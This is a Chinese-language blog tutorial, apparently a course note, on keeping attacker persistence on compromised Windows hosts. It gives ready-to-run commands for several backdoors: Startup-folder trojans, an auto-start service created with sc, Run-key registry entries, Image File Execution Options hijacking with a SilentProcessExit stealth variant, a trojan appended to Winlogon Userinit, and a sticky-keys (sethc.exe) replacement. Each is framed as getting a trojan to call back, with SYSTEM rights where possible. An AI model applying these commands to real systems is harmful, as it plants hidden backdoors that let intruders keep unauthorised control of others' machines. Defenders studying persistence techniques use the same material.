当前位置: 首页 > article >正文

第143天:内网安全-权限维持自启动映像劫持粘滞键辅助屏保后门WinLogon

案例一: 权限维持-域环境&单机版-自启动

自启动路径加载

路径地址

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\
##英文


C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\   
##中文

把木马程序上传到目标文件夹

重启服务器

自启动服务加载 

命令 创建自动启动的服务

sc create ServiceTest binPath= C:\1.exe start= auto  ##创建服务
sc delete ServiceTest   ##删除服务

木马就设置在c:/1.exe

重启主机 ,查看服务

成功上线,并且一定是system权限

自启动注册表加载

自启动注册表用户以及系统目录

- 当前用户键值
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- 服务器键值(需要管理员权限)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

添加,需要管理员权限运行

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\1.exe"

成功上线

查看注册表信息

计时任务

不过多介绍,不会看这篇文章

第128天:内网安全-横向移动&IPC&AT&SC 命令&Impacket 套件&CS 插件&全自动_横向移动之ipc配合任务计划-CSDN博客

案例二:权限维持-域环境&单机版-映像劫持

注册表的位置

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

注册表里面有很多可执行程序

把notepad命令替换成为exe命令,管理员权限运行

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "cmd.exe" 
#添加

REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /f
#删除

打开文本文档,直接会弹出exe,但是这样会比较可疑

正常你运行记事本后弹出这个窗口

配合GlobalFlag隐藏:执行记事本正常关闭,后触发别的程序,把后面的修改为自己想执行的程序即可

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1.exe"

执行文件关闭后

成功上线

案例三:权限维持-域环境&单机版-屏保&登录

利用的是登陆的时候的运行的程序,在程序后面加上程序,就可以

注册表的位置

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

打开后可以看到后面默认有一个逗号,可以添加程序

修改注册表,把木马程序加进去,管理员权限运行

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,C:\1.exe"

 

这个时候注销或者是等屏幕自动息屏登录的时候,会触发这个程序

 登录成功以后会上线

案例四:权限维持-域环境&单机版-粘滞键

了解即可,目前新版本系统已经用不了了。

修改的命令

move sethc.exe sethc1.exe
copy cmd.exe sethc.exe

并且修改需要很高的权限,system权限在cs中也无法运行

就是在远程连接的时候,按五次shift,会触发粘滞键位,把这个修改为cmd就可以运行对面的cmd命令,也可以修改为木马直接执行。

原文地址:https://blog.csdn.net/weixin_71529930/article/details/141950540
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.kler.cn/a/299642.html

相关文章:

  • Java面试篇基础部分-Java中常用的I/O模型
  • EG边缘计算网关连接华为云物联网平台(MQTT协议)
  • Artitalk配置图床
  • 敏捷与企业架构:战略联盟
  • C#中chart绘制曲线
  • 居然还有人不懂强引用、弱引用与软引用
  • svn常见错误及解决办法
  • 「豆包 Marscode 体验官」AI 加持的云端 IDE——三种方法高效开发前后端聊天交互功能
  • spring ai整合ollama anythingllm
  • webpack+lite-server 构建项目示例
  • 二百六十三、Java——IDEA项目打成jar包,然后在Linux中运行
  • 智能交通(四)——CMC特刊推荐
  • C#Bitmap和Image之间的关系
  • 线性代数基础:向量、矩阵、张量及其在机器学习中的应用详解
  • C++——矩阵无重复行列取数问题
  • 游戏出海迎新变局——海外游戏市场有哪些新趋势和新机遇?
  • SAP自动付款和自动付款常见错误解决方案
  • SAP ABAP选择屏幕(ACTIVE,INPUT,REQUIRED)
  • 说一下解除docker限制内存警告
  • 基于SpringBoot+Vue+MySQL的房屋租赁管理系统